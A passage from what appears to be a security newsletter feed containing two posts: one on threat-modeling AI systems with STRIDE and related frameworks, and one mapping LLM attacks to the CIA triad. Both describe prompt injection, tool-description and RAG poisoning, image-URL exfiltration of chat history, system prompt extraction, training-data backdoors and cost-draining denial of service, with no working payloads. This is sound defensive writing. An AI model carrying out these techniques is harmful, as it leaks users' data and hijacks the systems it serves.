Systems</h2><p>In traditional apps, spoofing means one entity pretends to be another. Fake login, stolen session cookie, forged certificate. In AI systems, the attack surface expands in two directions.</p><p>First, model-level spoofing. An attacker serves a trojaned model that mimics a legitimate one. You pull what looks like Llama-3 from a community hub, but the weights contain a backdoor triggered by a specific phrase. The model passes your eval benchmarks. It even passes your red team runs. The payload fires only on the trigger. Model provenance, cryptographic signing of weights, and hash verification are the controls.</p><p>Second, agent identity spoofing. In multi-agent architectures where AI agents communicate and delegate tasks, one agent can impersonate another. Documented black markets show this at scale: AI agents trading credentials and weaponized skills with no human verification in the loop. If your agent trusts another agent&#8217;s claimed identity without cryptographic proof, you have a spoofing problem STRIDE was never designed to catch.</p><p><strong>Questions to ask:</strong> Who proves the model is what it claims to be? How do agents verify each other&#8217;s identity in multi-agent workflows? Can an attacker substitute a model at any point in the supply chain?</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>How Tampering Targets the AI Pipeline</h2><p>Traditional tampering modifies data at rest or in transit. Database row gets changed. Config file gets swapped. In AI, tampering hits three distinct asset classes.</p><p>Training data poisoning is the big one. An attacker injects crafted samples into your training set, and the model learns the malicious pattern as ground truth. This can happen through contaminated public datasets, scraped web content, or compromised third-party data providers. The model ships with the backdoor baked in. No runtime exploit needed.</p><p>Prompt injection is tampering at inference time. The attacker modifies the instructions the model follows by injecting payloads into user input, retrieved documents, or tool descriptions. <a href="https://genai.owasp.org/llmrisk/llm01-prompt-injection/">OWASP ranks this LLM01:2025</a> for the second consecutive year. The model can&#8217;t distinguish developer instructions from attacker instructions because both arrive as tokens processed by the same attention mechanism. And it gets worse when the payload arrives in an image or audio file, since <a href="https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio">multimodal injections</a> ride right past text-based sanitizers.</p><p>RAG document poisoning sits between training and inference. The attacker plants a malicious document in your knowledge base. When a user query retrieves it, the model follows the embedded instructions. Research demonstrated that a single injected document achieves higher success rates than older multi-document approaches.</p><p><strong>Questions to ask:</strong> Where does untrusted data enter the training pipeline? Who can modify documents in the RAG knowledge base? Are tool descriptions treated as trusted input?</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/how-to-threat-model-ai-applications/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/how-to-threat-model-ai-applications/comments"><span>Leave a comment</span></a></p></blockquote><h2>How Repudiation Hides in Agent Logs</h2><p>Repudiation in traditional systems means someone does something and you can&#8217;t prove it. Missing audit logs. Unsigned transactions. The fix is straightforward: log everything, sign the entries, retain them securely.</p><p>AI agents make this exponentially harder. An autonomous agent chains tool calls, makes decisions based on probabilistic reasoning, and produces outputs that vary run to run. If an agent makes a financial decision, modifies a file, or sends a message, can you reconstruct why? Most agent frameworks log the final output. Few log the full reasoning chain, the retrieved context, the tool call sequence, or the system prompt that was active when the decision fired. The <a href="https://www.toxsec.com/p/ai-kill-chain-explained">AI kill chain</a> persistence phase exploits exactly this gap: an attacker poisons the agent&#8217;s memory, and the tampered state persists across sessions with no audit trail showing when it changed.</p><p><strong>Questions to ask:</strong> Does every agent tool call get logged with parameters and return values? Can you reconstruct the full context window that produced a given output? Are reasoning chains stored, or just final answers?</p><blockquote><div class="directMessage button" data-attrs="{&quot;userId&quot;:8759131,&quot;userName&quot;:&quot;ToxSec&quot;,&quot;canDm&quot;:null,&quot;dmUpgradeOptions&quot;:null,&quot;isEditorNode&quot;:true}" data-component-name="DirectMessageToDOM"></div></blockquote><h2>How Information Disclosure Leaks From AI Systems</h2><p>Traditional info disclosure means sensitive data reaches someone who shouldn&#8217;t see it. SQL injection dumps the user table. Error messages expose stack traces. AI systems leak through entirely new channels.</p><p>System prompt extraction is the most common. The system prompt contains the developer&#8217;s instructions, business logic, and sometimes credentials. An attacker coaxes the model into reproducing it verbatim. This is trivially easy on most deployments. Jailbreak techniques that bypass safety training give the attacker direct access to whatever&#8217;s in the context window.</p><p>Embedding inversion is the quieter threat. Vector databases store your documents as numerical embeddings. Research has shown these embeddings can be reversed back into the original text. Your &#8220;encrypted&#8221; knowledge base is functionally plaintext if the embeddings are accessible.</p><p>Context window exfiltration chains with tool access. If the model can render Markdown images and the client loads them, an attacker can encode the context window contents into a URL parameter. The model generates what looks like a weather icon. The server on the other end receives your conversation history. This is the exact chain used in <a href="https://www.toxsec.com/p/lets-poison-the-mcp">MCP tool poisoning attacks</a> running in production today.</p><p><strong>Questions to ask:</strong> What&#8217;s in the system prompt? Can any user-facing path extract it? Are vector embeddings accessible outside the application? Does the client render model-generated URLs without sanitization?</p><blockquote><div class="community-chat" data-attrs="{&quot;url&quot;:&quot;https://open.substack.com/pub/toxsec/chat?utm_source=chat_embed&quot;,&quot;subdomain&quot;:&quot;toxsec&quot;,&quot;pub&quot;:{&quot;id&quot;:4991138,&quot;name&quot;:&quot;ToxSec - AI and Cybersecurity &quot;,&quot;author_name&quot;:&quot;ToxSec&quot;,&quot;author_photo_url&quot;:&quot;https://substackcdn.com/image/fetch/$s_!J0tu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbcc231af-becb-46d7-a503-8314a6b5e870_3840x3840.png&quot;}}" data-component-name="CommunityChatRenderPlaceholder"></div></blockquote><h2>How Denial of Service Drains AI Budgets</h2><p>Traditional DoS floods a server. AI denial of service is subtler and more expensive. Every LLM query burns tokens. Every token costs money. An attacker who forces the model into expensive execution paths doesn&#8217;t crash your service. They drain your cloud budget while staying under every request-based rate limit you&#8217;ve set.</p><p>Documented incidents include $46,000/day consumption attacks against AWS Bedrock via stolen credentials (Sysdig&#8217;s LLMjacking research), and an $82,000 Gemini API bill in 48 hours from a single compromised key earlier this year. Standard rate limiters count requests, not cost. One request hitting a multi-step agentic workflow can cost 500x more than a cached response. Both count as one request. We covered the full attack pattern in <a href="https://www.toxsec.com/p/denial-of-wallet">denial of wallet</a>.</p><p><strong>Questions to ask:</strong> Do you rate-limit by tokens or by requests? Is there a hard spending cap per API key? How fast would you detect a 4,000% spike in token usage at 2 AM?</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/how-to-threat-model-ai-applications?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/how-to-threat-model-ai-applications?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>How Elevation of Privilege Chains Through Agent Tools</h2><p>In traditional apps, privesc means a regular user gains admin access. Buffer overflow, misconfigured RBAC, path traversal to a config file. In AI systems, the model itself is the privilege boundary, and it&#8217;s terrible at enforcing one.</p><p>Excessive agency is the OWASP term. The model has access to tools, APIs, file systems, and external services. If the model can be tricked via prompt injection into calling those tools with attacker-controlled parameters, the attacker inherits every permission the model holds. Vibe-coded applications ship with admin routes unprotected because the AI never thought to add auth. MCP tool chains grant the agent capabilities the developer never scoped. Each connected tool is another capability an attacker inherits. The full picture of <a href="https://www.toxsec.com/p/owasp-top-10-for-genai">how OWASP LLM Top 10 chains together in production</a> shows why this category sits at the top of every real incident.</p><p>The NVIDIA AI Kill Chain maps this as the hijack phase: the attacker takes control of the model&#8217;s behavior, then uses its legitimate tool access to reach systems the attacker could never touch directly.</p><p><strong>Questions to ask:</strong> What&#8217;s the least privilege set this agent actually needs? Can the model invoke destructive operations without human approval? Are tool permissions scoped per-session or standing?</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>Beyond STRIDE: MAESTRO, ASTRIDE, and Shostack&#8217;s Four Questions</h2><p>STRIDE gives you the vocabulary. It tells you what can go wrong. But it was designed for applications with predictable execution paths, and AI breaks that assumption at the architectural level. Three extensions fill the gaps.</p><p><a href="https://www.mdpi.com/1424-8220/22/17/6662">STRIDE-AI</a> (Mauri &amp; Damiani, 2021 IEEE CSR) was the first formal adaptation. It maps STRIDE categories to ML-specific assets across the full pipeline: training data, model weights, inference APIs, and deployment artifacts. The contribution is making ML assets first-class citizens in the threat model instead of afterthoughts.</p><p><a href="https://arxiv.org/abs/2512.04785">ASTRIDE</a> (December 2025) is the first STRIDE-derived extension purpose-built for agentic systems. It adds a seventh category, &#8220;A&#8221; for AI Agent-Specific Attacks, covering prompt injection, unsafe reasoning-driven tool use, and context window manipulation. The framework leans hard into automated diagram-driven analysis using vision-language models.</p><p><a href="https://cloudsecurityalliance.org/blog/2025/02/06/agentic-ai-threat-modeling-framework-maestro">MAESTRO</a> (Cloud Security Alliance, February 2025) takes a different approach entirely: seven architectural layers from foundation models through reasoning and communication, each evaluated for AI-specific threats like multimodal injection, hallucination exploitation, and cross-layer threat chaining. Where STRIDE asks &#8220;what can go wrong at each component,&#8221; MAESTRO asks &#8220;what can go wrong at each layer of the AI stack.&#8221;</p><p>Adam Shostack&#8217;s Four Questions remain the backbone regardless of framework: What are we working on? What can go wrong? What are we going to do about it? Did we do a good enough job? Recent Microsoft guidance reinforces that AI threat modeling only works when grounded in the system as it truly operates, where the prompt assembly pipeline is a first-class security boundary.</p><blockquote><p>That's the framework. </p><p>Behind the wall: the copy-paste prompt that runs a full STRIDE-AI pass against your own architecture in one shot, the seven red flags that mean you're already exposed, and the exact three-layer circuit breaker that catches denial-of-wallet before the $82K invoice lands. </p><p>Free subs get the theory. Paid subs get the kit.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/how-to-threat-model-ai-applications">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[CIA Triad for LLM Security: Real-World AI Attack Failures]]></title><description><![CDATA[Confidentiality, integrity, and availability map every documented LLM attack failure. Here&#8217;s how prompt injection breaks each pillar.]]></description><link>https://www.toxsec.com/p/cia-triad-for-llm-security</link><guid isPermaLink="false">https://www.toxsec.com/p/cia-triad-for-llm-security</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Mon, 18 May 2026 13:45:59 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!sDXh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sDXh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sDXh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!sDXh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!sDXh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!sDXh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sDXh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7081713,&quot;alt&quot;:&quot;CIA triad LLM security framework showing confidentiality, integrity, and availability failures in real-world AI attacks including prompt injection, training data poisoning, and model denial-of-service exploits.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/198156103?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F183c69da-1330-4682-bfc3-494a186ccfe6_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="CIA triad LLM security framework showing confidentiality, integrity, and availability failures in real-world AI attacks including prompt injection, training data poisoning, and model denial-of-service exploits." title="CIA triad LLM security framework showing confidentiality, integrity, and availability failures in real-world AI attacks including prompt injection, training data poisoning, and model denial-of-service exploits." srcset="https://substackcdn.com/image/fetch/$s_!sDXh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!sDXh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!sDXh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!sDXh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7feae1db-55c6-4cc1-bdb2-829732c4a13b_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> The CIA triad still applies to LLM security, and every major documented AI attack failure to date breaks one of its three legs. Confidentiality leaks system prompts and chat history. Integrity attacks rewrite what models output through prompt injection and training data poisoning. Availability attacks crash inference endpoints with expensive prompts. Johann Rehberger&#8217;s <a href="https://arxiv.org/abs/2412.06090">arxiv paper &#8220;Trust No AI&#8221;</a> catalogs real-world exploits across all three pillars in production systems from OpenAI, Microsoft, Anthropic, and Google.</p><blockquote><p>Subscribe to ToxSec. Free attack walkthroughs every Sunday, the kill switches drop Thursday.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why the CIA Triad Still Matters for LLMs</h2><p>The CIA triad still matters for LLMs because <strong>every major documented AI attack failure to date maps cleanly onto one of its three pillars.</strong> Confidentiality, integrity, availability. The framework is from the 1970s. Some folks will tell you it&#8217;s obsolete, that AI needs something new. Then Johann Rehberger publishes a forty-page arxiv paper documenting real prompt injection exploits across OpenAI, Microsoft, Anthropic, and Google products, and every single failure he catalogs is a C, an I, or an A breach. The names changed. The surface changed. The framework didn&#8217;t.</p><p>The cybersecurity industry will not stop bolting on extensions. CIA+TA. CIA+P. AICA. Pick a vowel, somebody has tacked it on. But the core question we ask before firing a payload is still: am I going after what the system knows, what it does, or whether it runs. That&#8217;s the triad. That&#8217;s it. OWASP&#8217;s Top 10 for LLM Applications, MITRE ATLAS, the MDPI taxonomy, the medRxiv folks studying medical models, they all sort attacks the same way. We use the triad because the triad still draws a clean line around the failure mode. Drop the framework and you lose the only common vocabulary defenders and attackers share. That&#8217;s not progress.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/cia-triad-for-llm-security?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/cia-triad-for-llm-security?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>What Does the CIA Triad Mean for an LLM?</h2><p>For an LLM, <strong>confidentiality protects what the model knows and processes, integrity protects what the model outputs, and availability protects whether the model can serve a request at all.</strong> Same three pillars. Different attack surfaces. Here&#8217;s the mapping that actually works for AI systems:</p><p>A confidentiality breach on a chatbot is not the same as a confidentiality breach on a SQL database. The attacker is not pulling rows. They are asking the model to repeat its instructions, summarize a document it was never supposed to share, or hallucinate credentials from a poisoned tool description. The asset is text inside a context window. The exfil channel is the response itself. That changes how you defend it. The triad name stays the same.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>Confidentiality: How LLMs Leak Data on Command</h2><p>LLMs leak data on command when attackers either ask politely or hide the ask inside other text the model trusts. The polite approach is direct prompt injection. The hidden approach is <a href="https://www.toxsec.com/p/ai-and-cybersecurity">indirect prompt injection</a>, where the payload rides in on a document, an email, a webpage, or an MCP (Model Context Protocol) tool description.</p><p>The most documented confidentiality failure is <strong>system prompt extraction</strong>. Researchers at Embrace The Red published exploits against ChatGPT, Microsoft Copilot, Bing Chat, and Claude where the model spilled its own system prompt after a few rounds of phrased requests. The system prompt is supposed to be invisible. Instructions, capabilities, persona, policy rules. The model reads it as input every turn, and an attacker who can get the model to repeat its input gets the policy.</p><p>Chat history exfiltration is the next layer. With Markdown rendering and tool-using capabilities enabled, a single <a href="https://www.toxsec.com/p/lets-poison-the-mcp">indirect injection embedded in a poisoned MCP tool description</a> can trick the model into URL-encoding the conversation and shipping it to an attacker-controlled domain through an image tag. Same chain works through email, RAG (retrieval-augmented generation, where the model retrieves context from external documents at query time), and document upload.</p><p>In February 2026, Microsoft&#8217;s Copilot integration into Notepad converted a sandbox-free offline text editor into a <a href="https://www.toxsec.com/p/when-your-notepad-app-gets-a-cve-4fc">network-facing surface that leaked user data</a> through cloud-side AI processing. The CIA triad propagated up the stack right alongside the AI feature.</p><blockquote><p>Restack to put ToxSec on someone's radar. The fewer surprises in your inbox, the better.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>How Do Attackers Break LLM Integrity?</h2><p>Attackers break LLM integrity by smuggling instructions past the model&#8217;s safety training and rewriting what it produces, either at inference time or at the training stage. The inference-time version is prompt injection. The training-time version is data poisoning. Both make the model do something the developer never authorized.</p><p>Direct injection is the obvious move and the easiest to block. Wrap the same payload in conversation-formatted JSON inside a PDF and the model executes it as if it already agreed. We&#8217;ve <a href="https://www.toxsec.com/p/lets-poison-the-mcp">walked through the wrapper trick in detail</a> using MCP. Same architectural blind spot lives in every system: the model processes instructions and data through the same attention mechanism with no privilege separation.</p><p>The training-time attack is worse because it scales. Anthropic, AISI, and the Alan Turing Institute published research in late 2024 showing <strong>as few as 250 poisoned documents can install a backdoor</strong> in a large language model regardless of total training data volume. The attacker seeds GitHub, Medium, Reddit, or any other source the scrapers hoover up. The trigger phrase ships with the model. Nothing in the binary signals compromise.</p><p>The November 2025 Anthropic disclosure on a Chinese state-sponsored group jailbreaking Claude Code into an autonomous attack agent against thirty global targets is the highest-impact integrity attack of the modern era. The <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">jailbreak was the skeleton key</a>. The model handled 80-90 percent of the operation, making thousands of requests per second. For the full <a href="https://www.toxsec.com/p/nvidias-ai-kill-chain">stage-by-stage attack mapping</a>, the AI kill chain documents this end-to-end.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/cia-triad-for-llm-security/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/cia-triad-for-llm-security/comments"><span>Leave a comment</span></a></p></blockquote><h2>Availability: How LLMs Get Knocked Offline</h2><p>An LLM gets knocked offline when an attacker either floods it with expensive prompts or finds an input pattern that triggers runaway compute. Model denial-of-service is OWASP LLM Top 10 entry four for a reason. The attack surface is the inference endpoint, and the asset is service availability.</p><p>Three patterns matter. First, recursive output forcing. Ask the model to elaborate, then elaborate on the elaboration, then write ten thousand tokens explaining the previous response. Each call eats GPU time. If you can wedge this loop into an agentic system that auto-continues, you&#8217;ve found a free DoS at someone else&#8217;s API bill. Second, context window exhaustion. Inflate the input until the model spends real money processing useless tokens. Third, recursion bombs in tool-using agents. The model calls a tool, the tool returns a response that triggers another tool call, the chain doesn&#8217;t terminate.</p><p>The economic shape is what makes this dangerous. Traditional DoS needs a botnet. <strong>LLM DoS needs one really expensive prompt.</strong> The <a href="https://www.toxsec.com/p/owasp-top-10-for-genai">OWASP analysis on this</a> goes deeper. Same root cause: no privilege separation between user input and system behavior, and no built-in compute budget enforcement at the inference layer. Some vendors are starting to wire in per-request token limits and circuit breakers. Most are not. The attack remains viable today against any deployment that doesn&#8217;t enforce limits, and the cost of a single malformed prompt can run into real dollars before the rate limiter notices.</p><blockquote><div class="directMessage button" data-attrs="{&quot;userId&quot;:8759131,&quot;userName&quot;:&quot;ToxSec&quot;,&quot;canDm&quot;:null,&quot;dmUpgradeOptions&quot;:null,&quot;isEditorNode&quot;:true}" data-component-name="DirectMessageToDOM"></div></blockquote><h2>What Does the CIA Triad Miss for AI?</h2><p>The CIA triad misses two things specific to LLMs: the probabilistic nature of outputs, and the cognitive layer where the model influences human decisions before any data is ever leaked, tampered with, or denied. That gap is why researchers are proposing extensions like <a href="https://arxiv.org/abs/2508.15839">CIA+TA (Trust and Autonomy)</a> and Cognitive Confidentiality.</p><p>The probabilistic problem is the bigger one. A classical confidentiality control either holds or breaks. The data was disclosed, or it wasn&#8217;t. An LLM disclosing data is a percentage. Same prompt, run twice, can produce a leak the first time and a refusal the second. The <a href="https://www.medrxiv.org/content/10.1101/2025.07.16.25331645.full.pdf">2024 medRxiv study on medical LLMs</a> documented prompt injection success at 94.4 percent across 216 patient-dialogue simulations, with 91.7 percent success rate on extremely high-harm scenarios including FDA Category X pregnancy drugs. Not 100 percent. Not 0 percent. <strong>The triad doesn&#8217;t have language for risk that lives on a probability distribution.</strong></p><p>The cognitive layer is the second gap. When an LLM influences a decision through reasoning patterns, the user&#8217;s mental model of the topic shifts. No data was technically leaked. No output was technically tampered with. But the system altered downstream human judgment. The proposed CIA+TA framework from the cognitive security researchers tries to capture this with Trust and Autonomy axes. Whether the extension catches on or whether the triad just absorbs the additions over time, the gap is real and worth knowing. For now, the smart play is to read every attack through the original triad first, then ask whether what you&#8217;re seeing fits cleanly inside one of the three boxes. If it doesn&#8217;t, that&#8217;s where the next round of frameworks is going to be born.</p><blockquote><p>Subscribe to ToxSec &#8212; Sundays we draw the map, Thursdays we hand over the patch.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What is the CIA triad in LLM security?</h3><p>The CIA triad applied to LLM security maps three classical pillars (confidentiality, integrity, availability) to the unique attack surfaces of large language models. Confidentiality protects what the model knows, including system prompts, chat history, training data, and credentials passed through tool calls. Integrity protects what the model outputs, including safety guardrails, refusals, and tool call decisions. Availability protects whether the model can serve a request at all. Every documented LLM attack failure maps to at least one pillar, which is why the framework still dominates in OWASP, MITRE ATLAS, and academic taxonomies for AI security.</p><h3>Does the CIA triad still apply to AI?</h3><p>Yes, the CIA triad still applies to AI and especially to LLMs, though some researchers argue it needs extensions for cognitive and probabilistic risks unique to language models. The classical pillars cover every category of documented attack on production AI systems. Confidentiality covers system prompt extraction and chat history exfiltration. Integrity covers prompt injection, jailbreaks, and training data poisoning. Availability covers model denial-of-service via expensive prompts. Extensions like CIA+TA (adding Trust and Autonomy) try to capture the cognitive layer where models influence human decisions, but the original triad still draws clean lines around the failure modes.</p><h3>What is the most common LLM security attack?</h3><p>Prompt injection is the most common LLM security attack, ranked as the top threat in the OWASP Top 10 for LLM Applications and the most actively researched vulnerability class in arxiv security literature. Direct prompt injection bypasses system instructions through crafted user input. Indirect prompt injection hides the payload in documents, emails, webpages, or tool descriptions the model retrieves. Both work because LLMs process instructions and data through the same attention mechanism with zero privilege separation. The 2024 medRxiv study on medical LLMs documented 94.4 percent prompt injection success rates across simulated patient dialogues, demonstrating how reliably the attack reaches production systems.</p><h3>How does prompt injection break the CIA triad?</h3><p>Prompt injection breaks all three pillars of the CIA triad simultaneously, depending on how the attacker crafts the payload. Confidentiality breaks when the payload extracts system prompts, chat history, or RAG-retrieved documents the model should not share. Integrity breaks when the payload rewrites model output, makes the model lie, or hijacks tool calls toward attacker-chosen actions. Availability breaks when the payload triggers runaway compute, infinite tool loops, or token-exhaustion attacks. Johann Rehberger&#8217;s 2024 arxiv paper &#8220;Trust No AI&#8221; catalogs real-world prompt injection exploits across OpenAI, Microsoft, Anthropic, and Google products that span all three pillars in production systems.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS 